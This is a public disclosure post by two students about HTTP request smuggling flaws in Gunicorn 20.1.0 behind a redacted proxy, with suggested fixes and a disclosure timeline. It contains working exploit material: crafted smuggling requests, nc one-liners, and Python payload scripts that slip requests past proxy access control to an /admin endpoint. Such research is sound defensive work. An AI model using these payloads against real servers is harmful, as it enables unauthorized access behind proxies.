Gunicorn 20.1.0 Public Disclosure of Request Smuggling

2021-10-08 - Mattias Grenfeldt and Asta Olofsson

Summary

In our Bachelor's degree project we tested some open source proxies and servers for HTTP Request Smuggling vulnerabilities. This is what we found in Gunicorn. It has been more than 90 days since we reported these issues and Gunicorn has not fixed them, so this is our public disclosure.

You can read more about our Bachelor's thesis and find a link to the full thesis here.

We submitted two separate reports to Gunicorn. Below follows the two reports as they were submitted. Some parts of this post is redacted to not reveal other systems which haven't finished patching yet. At the bottom, there is a timeline of when submissions happened.

First Report: Several Request Smuggling vulnerabilities

Summary

In total we found 3 full attacks when Gunicorn is put behind [REDACTED]. These issues have also been reported to them. We also found 3 additional issues, that when combined with the right proxy would cause HRS. But we don't know of any such proxy that currently exists. We also found some minor specification violations that don't directly cause HRS, but should be fixed.

These issues were originally found in Gunicorn 20.0.4, but all still work in 20.1.0.

Proof of Concept

Included in the zip you will find a Proof of Concept setup using Docker and docker-compose which sets up Gunicorn as a server in front of [REDACTED]. This can be used to verify the full attacks below.

Authors' Comment

(not part of original report)

We can't show the entire PoC since it would reveal the proxy. But here is the app.py file that Gunicorn is serving:

from flask import Flask
app = Flask(__name__)

@app.route("/")
def index():
    return "INDEX\n"

@app.route("/admin", methods = ['GET', 'DELETE'])
def admin():
    print("/ADMIN was requested!!!", flush=True)
    return "ADMIN\n"

@app.route("/forbidden")
def forbidden():
    return "FORBIDDEN\n"

if __name__ == "__main__":
    app.run()

Gunicorn uses eventlet as a worker, to enable Keep-Alive connections, which is a prerequisite for HRS.

To run the PoC, unzip the zip and run:

$ docker-compose up --build

Now Gunicorn can be directly accessed at http://localhost:8081 and [REDACTED] can be accessed at http://localhost:8080.

Here is examples of interacting with Gunicorn directly:

$ curl http://localhost:8081/
INDEX
$ curl http://localhost:8081/admin
ADMIN
$ curl http://localhost:8081/forbidden
FORBIDDEN

Here is how it looks interacting with [REDACTED]:

$ curl http://localhost:8080/
INDEX
$ curl http://localhost:8080/admin
FORBIDDEN
$ curl http://localhost:8080/forbidden
FORBIDDEN

Plus and minus sign in the Content-Length header

This is the first full attack. Gunicorn accepts a plus sign or a minus sign in front of the value in the Content-Length header.

Example:

GET / HTTP/1.1
Host: example.com
Content-Length: +3
 
abc

This request gets accepted and Gunicorn reads the body.

According to RFC 7230 only numbers should be allowed in the Content-Length header value. See the ABNF here

For a HRS vulnerability to occur a proxy would have to forward the CL header as is and interpret the length of the body to be 0. [REDACTED] does this. However, since this is an example of Backward HRS and not Forward HRS (see here Section "Example #3: Forward vs. backward HRS" for an example), the proxy must communicate with the server using pipelining for there to be a vulnerability and [REDACTED] doesn't support pipelining.

However, an additional bug was found in Gunicorn which still enables the attack.

Send response before reading body

As it turned out, a bug was discovered which causes Gunicorn to send the response before reading the body of the corresponding request. This only occurs if the request handler invoked by Gunicorn never reads any part of the body.

This can be demonstrated by sending the following, incomplete request directly to Gunicorn in the PoC setup:

GET / HTTP/1.1
Host: example.com
Content-Length: 10

This can be sent using the following one-liner:

$ echo -en "GET / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\n" | nc localhost 8081

The headers of the incomplete request will be read by Gunicorn, sent to the Flask handler, the handler will not read any part of the body, control will be handed back to Gunicorn, Gunicorn will send the response back and will then read the missing body. The body of the request should be read before the response is sent.

This bug enables the above Plus sign in CL attack. Here comes the smuggling part! Now we are going to send the following to [REDACTED]:

GET / HTTP/1.1
Host: localhost:8080
Content-Length: +23

GET / HTTP/1.1
Dummy: GET /admin HTTP/1.1
Host: localhost:8080

In this case [REDACTED] will see two requests:

GET / HTTP/1.1
Host: localhost:8080
Content-Length: +23

GET / HTTP/1.1
Dummy: GET /admin HTTP/1.1
Host: localhost:8080

And Gunicorn will see two different requests:

GET / HTTP/1.1
Host: localhost:8080
Content-Length: +23

GET / HTTP/1.1
Dummy:

GET /admin HTTP/1.1
Host: localhost:8080

We can send this with the following command. The result is shown right after:

$ echo -en "GET / HTTP/1.1\r\nHost: localhost:8080\r\nContent-Length: +23\r\n\r\nGET / HTTP/1.1\r\nDummy: GET /admin HTTP/1.1\r\nHost: localhost:8080\r\n\r\n" | nc localhost 8080

HTTP/1.1 200 OK
Content-Length: 6

INDEX
HTTP/1.1 200 OK
Content-Length: 6

ADMIN

We can see that we get two responses, one from the / endpoint and one from the /admin endpoint. We managed to smuggle a request for /admin past [REDACTED] directly to Gunicorn.

The Fix

Respond with 400 Bad Request on all requests containing Content-Length headers that don't match the correct ABNF

Content-Length = 1*DIGIT

from here

Illegal characters in header value

Gunicorn accepts CR and LF as part of header values. These characters are not allowed in header values. In the case of LF, this causes the second full attack in combination with [REDACTED], since [REDACTED] interprets LF as a line ending and forwards it. An attack using CR would work in the same way, we have however not found a proxy which interprets a single CR as a line ending.

Here is the attack. We are going to send the following to [REDACTED]:

GET / HTTP/1.1
Host: localhost:8080
Dummy: x\nContent-Length: 28

GET /admin HTTP/1.1
Dummy: GET / HTTP/1.1
Host: localhost:8080

In this case [REDACTED] will see two requests:

GET / HTTP/1.1
Host: localhost:8080
Dummy: x\nContent-Length: 28

GET /admin HTTP/1.1
Dummy:

GET / HTTP/1.1
Host: localhost:8080

And Gunicorn will see two different requests:

GET / HTTP/1.1
Host: localhost:8080
Dummy: x\nContent-Length: 28

GET /admin HTTP/1.1
Dummy: GET / HTTP/1.1
Host: localhost:8080

We can send this with the following command. The result is shown right after:

$ echo -en "GET / HTTP/1.1\r\nHost: localhost:8080\r\nDummy: x\nContent-Length: 28\r\n\r\nGET /admin HTTP/1.1\r\nDummy: GET / HTTP/1.1\r\nHost: localhost:8080\r\n\r\n" | nc localhost 8080

HTTP/1.1 200 OK
Content-Length: 6

INDEX
HTTP/1.1 200 OK
Content-Length: 6

ADMIN

We can see that we managed to reach the /admin endpoint.

The fix

Filter all characters in header values to only contain the accepted ones. These are the allowed bytes: 0x21-0x7E and 0x80-0xff.

Sources: here and here

Ignoring unkown transfer encoding values

This is the third full attack. Gunicorn ignores all transfer encoding values which it does not have support for. According to the specification "A server that receives a request message with a transfer coding it does not understand SHOULD respond with 501 (Not Implemented)" - From the RFC7230

[REDACTED] interprets requests with Transfer-Encoding: "chunked" (including the quotes) as a valid chunked request and forwards the TE header unmodified. Since Gunicorn ignores unknown TE headers, this enables us to smuggle a chunked body and Gunicorn will interpret it as a request. Due to a bug in how [REDACTED] parses and forwards chunked bodies, a valid DELETE request can be forwarded as the smuggled chunked body. Due to another bug in [REDACTED] however, the response cannot be smuggled back to the sender as in the other cases.

To summarize: Because Gunicorn ignores unknown TE values, DELETE requests can be smuggled past [REDACTED] to Gunicorn, but the responses can't be seen.

Here is the attack. We are going to send the following to [REDACTED]:

GET / HTTP/1.1
Host: localhost:8080
Transfer-Encoding: "chunked"

DELETE /admin HTTP/1.1
Host: localhost:8080
Padding: AAAAAAAAAAA[repeated 191 times]AAAAAAAAAAA
0: x

In this case [REDACTED] will see only one request, the GET. But Gunicorn will see two requests, both the GET and the DELETE.

We can send this with the following command. The result is shown right after:

$ python3 -c 'import sys;sys.stdout.buffer.write(b"GET / HTTP/1.1\r\nHost: localhost:8080\r\nTransfer-Encoding: \"chunked\"\r\n\r\nDELETE /admin HTTP/1.1\r\nHost: localhost:8080\r\nPadding: "+b"A"*191+b"\r\n0: x\r\n\r\n")' | nc localhost 8080
HTTP/1.1 200 OK
Content-Length: 6
Connection: keep-alive

INDEX

We can't see any proof of smuggling a request to /admin in the response. But if we look in the console of docker-compose, we can see that the debug message "/ADMIN was requested!!!" has been printed.

The Fix

There are two approaches to parse the Transfer-Encoding header correctly. The first approach is when multiple values in the header are to be supported:

If obs-folds are supported, replace them with spaces, collapsing the obsfold onto one line. See the sixth paragraph here
If there are multiple separate TE headers, combine them into one by joining their values with a comma as delimiter. See third paragraph here
Split the now single TE value at commas and strip/trim any spaces around the separate elements. Now you have a list of strings. Sources: here and here
Check that the last value in the list equals 'chunked'. The comparison should be case-insensitive. If not, respond with 400 Bad Request. See item 3 here and paragraph 3 here
Check that 'chunked' doesn't appear anywhere else in the list. See paragraph 3 here
Parse each string in the list for potential 'transfer-extension's. Details can be found here
Check that all values in the list are supported, otherwise respond with 501 Not Implemented. See last paragraph here

Authors' Comment

(not part of original report)

Step 5 in the list above is wrong, since the RFC reads: "A sender MUST NOT apply chunked more than once to a message body [...]" And we are talking here about what a receiver should or should not do.

The second approach is for when only 'chunked' is to be supported and is much simpler. This approach is adopted by Nginx and Go.

See step 1 above.
Reject all messages with more than one TE header.
Check that the TE header has the case insensitive value 'chunked'. If not, respond with 501 Not Implemented.

0xN chunksize

Gunicorn accepts requests containing chunksize in the form "0xN".

Example:

GET / HTTP/1.1
Host: example.com
Transfer-Encoding: chunked

0x3
abc
0

This request gets accepted by Gunicorn and it reads the body as abc. This combined with [REDACTED] almost became another full attack, but due to some technicalities in [REDACTED], the attack is currently impossible. The attack would have used the fact that [REDACTED] would interpret a chunksize on the format 0xN as having size 0.

The Fix

Only allow hexadecimal strings as the chunk size. No 0x prefix. See here

HTTP versions / Interprets 1.0 with TE chunked

Authors' Comment

(not part of original report)

The way Gunicorn behaves in the following issue "Interprets 1.0 with TE chunked" is not wrong, even though we say it is. We discovered that the RFC's can be interpreted in two different ways regarding this issue. We brought it up to the httpwg in an issue on their Github which resulted in them making changes to the new RFC. The issue can be found here. We also informed Gunicorn about our mistake.

Gunicorn accepts requests with all HTTP versions (even non exsisting ones, for example, 8.9 or 483920749374584.738927489734) and interprets them as 1.1, including 0.9 and 1.0. When Gunicorn responds to a request it echoes the version of the request in the version of the response.

The Transfer-Encoding header was introduced in version 1.1. This means in version 1.0 a Transfer-Encoding header with the value chunked should be ignored. Gunicorn however interprets the request as chunked. Example:

GET / HTTP/1.0
Host: example.com
Transfer-Encoding: chunked

3
xyz
0

Gunicorn would interpret this as having the body 'xyz'.

This could cause HRS if combined with a proxy which correctly ignores, but forwards TE headers in 1.0 requests. If a request is sent with both a CL and a TE header, the proxy would interpret CL and Gunicorn would interpret the TE header.

This almost exists in Go proxies (Caddy, Traefik). They ignore the TE header on 1.0 requests, but don't forward it.

The Fix

Ignore the TE header on 1.0 requests or reject the request entirely.

Also, reject any requests with unsupported versions and don't echo back anything that is received.

No Host header accepted

Gunicorn accepts and reponds to requests containing no Host header. According to the specification (RFC 7230) "A server MUST respond with a 400 (Bad Request) status code to any HTTP/1.1 request message that lacks a Host header field[...]" see here.

Second Report: Request Smuggling due to chunked extension parsing

The Bug: Ignoring chunk extensions

In the chunked transfer encoding format there can be a so called chunk extension after each chunk size. Example:

GET / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
 
5 ; a=b
hello
0

In the example above the chunk extension would be ; a=b. You can read more here and here.

Gunicorn doesn't try to parse the chunk extension properly, but simply ignores every byte until it reaches a \r (source). By following the ABNF of chunk extensions one can see that the only allowed bytes in this area are 0x09, 0x21-0x7e and 0x80-0xff. But Gunicorn allows any byte. This is the bug.

Notably we can put a \n in this area. This allows us to perform HRS when combined with [REDACTED]. This is because [REDACTED] also incorrectly parses the chunked extension. [REDACTED] looks for the first \n character and doesn't verify whether it was preceded by a \r. We arrive at the following attack:

GET / HTTP/1.1
Host: localhost:8080
Transfer-Encoding: chunked
 
2;\nxx
4c
0

GET /admin HTTP/1.1
Host: localhost:8080
Transfer-Encoding: chunked
 
0

By sending the data above when [REDACTED] is a proxy in front of Gunicorn, [REDACTED] will see one request to / and Gunicorn will see two requests, one to / and one to /admin. Note that all lines are terminated by CRLF (\r\n).

Usually with HRS it is possible to smuggle a request past a proxy directly to the server and then get a response for the smuggled request back to the attacker. But due to a bug in [REDACTED] where the connection hangs after a chunked request is sent, we can in this case only send a smuggled request and not see the response. But we have full control over the headers and body of the smuggled request.

Proof Of Concept

This Proof of Concept requires docker and docker-compose.

Unzip the attached poc.zip. Start the systems with sudo docker-compose up --build. Now Gunicorn can be accessed directly at http://localhost:8081 and [REDACTED] (forwarding to Gunicorn) can be accessed at http://localhost:8080

Gunicorn behaves like this:

$ curl http://localhost:8081
INDEX
$ curl http://localhost:8081/admin
ADMIN
$ curl http://localhost:8081/forbidden
FORBIDDEN

Note that when /admin is requested, then "/ADMIN was requested!!!" is printed in the docker-compose terminal.

[REDACTED] behaves like this:

$ curl http://localhost:8080
INDEX
$ curl http://localhost:8080/admin
FORBIDDEN
$ curl http://localhost:8080/forbidden
FORBIDDEN

Note that all requests to /admin are rerouted to /forbidden by [REDACTED]. So the /admin endpoint can't be reached.

Now it's time to send the attack described above. This can be done by using the included payload.py. The attack can be sent using the following command:

python3 payload.py | nc localhost 8080

Authors' Comment

(not part of original report)

We can't show the entire PoC since it would reveal the proxy. But here is payload.py:

import sys

smuggled = (
    b"GET /admin HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Transfer-Encoding: chunked\r\n" +
    b"\r\n" +
    b"0\r\n" +
    b"\r\n"
)

def h(n):
    return hex(n)[2:].encode()

smuggled_len = h(len(smuggled) - 7 + 5)

first_chunk_len = h(len(smuggled_len))

sys.stdout.buffer.write(
    b"GET / HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Transfer-Encoding: chunked\r\n" +
    b"\r\n" +
    first_chunk_len + b";\n" + b"x"*len(smuggled_len) + b"\r\n" +
    smuggled_len + b"\r\n" +
    b"0\r\n" +
    b"\r\n" +
    smuggled
)

When the attack is sent, we see "/ADMIN was requested!!!" being printed in the terminal. So we bypassed the proxy and reached /admin.

(As mentioned before, due to a bug in [REDACTED], the response to the smuggled request can't be seen. If [REDACTED] would not have had the mentioned bug, then payload2.py could have been used to both send a request and see the response.)

Authors' Comment

(not part of original report)

We can't show the entire PoC since it would reveal the proxy. But here is payload2.py:

import sys

last = (
    b"GET / HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"\r\n"
)

smuggled = (
    b"GET /admin HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Content-Length: " + str(len(last) + 5).encode() + b"\r\n" +
    b"\r\n" +
    b"0\r\n" +
    b"\r\n"
)

def h(n):
    return hex(n)[2:].encode()

smuggled_len = h(len(smuggled) - 7 + 5)

first_chunk_len = h(len(smuggled_len))

sys.stdout.buffer.write(
    b"GET / HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Transfer-Encoding: chunked\r\n" +
    b"\r\n" +
    first_chunk_len + b";\n" + b"x"*len(smuggled_len) + b"\r\n" +
    smuggled_len + b"\r\n" +
    b"0\r\n" +
    b"\r\n" +
    smuggled +
    last
)

Impact

If the proxy is acting as an access control system, only allowing certain requests to come through, it can be bypassed, allowing any request to be sent to the server.

Timeline

2021-05-15: Emailed [email protected] about the first report.
2021-06-27: Emailed [email protected] about the second report.
2021-10-08: This blog post is released. 146 days after first report and 103 days after second report.